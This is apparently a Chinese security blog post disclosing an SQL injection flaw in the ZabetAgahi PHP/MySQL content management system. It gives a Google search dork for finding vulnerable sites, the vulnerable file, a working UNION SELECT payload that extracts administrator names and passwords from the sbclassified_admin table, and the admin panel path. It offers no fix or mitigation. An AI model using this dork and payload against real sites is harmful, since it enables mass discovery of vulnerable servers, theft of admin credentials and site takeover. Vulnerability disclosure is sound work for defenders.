ZabetAgahi SQL 注入漏洞

  • A+
所属分类:lcx

By:追心

漏洞说明:

    ZabetAgahi是一款国外的基于PHP+MYSQL的内容管理系统,ZabetAgahi 由于设计上的缺陷,导致SQL注入漏洞。

漏洞类型:

    sql注入、sql盲注、脚本盲注、注入漏洞

谷歌关键词:

    inurl:ZabetAgahiCategory.php?cid=

漏洞文件:

    ZabetAgahiCategory.php

漏洞测试:

    http://www.baidu.com/ZabetAgahiCategory.php?cid=[SQL]
    http://www.baidu.com/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--

后台地址:

    http://www.baidu.com/AdminZabetAgahi/AdminZabetAgahiHome.php

文章来源于lcx.cc:ZabetAgahi SQL 注入漏洞

相关推荐: Html 使用Java脚本获取当前页面所有脚本地址

Html 使用Java脚本获取当前页面所有脚本地址: javascript:var h="";for(i=0; i";x=window.open("about");x.document.write(h);     使用方法,极其简单。当打开指定页面后,在地址栏…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: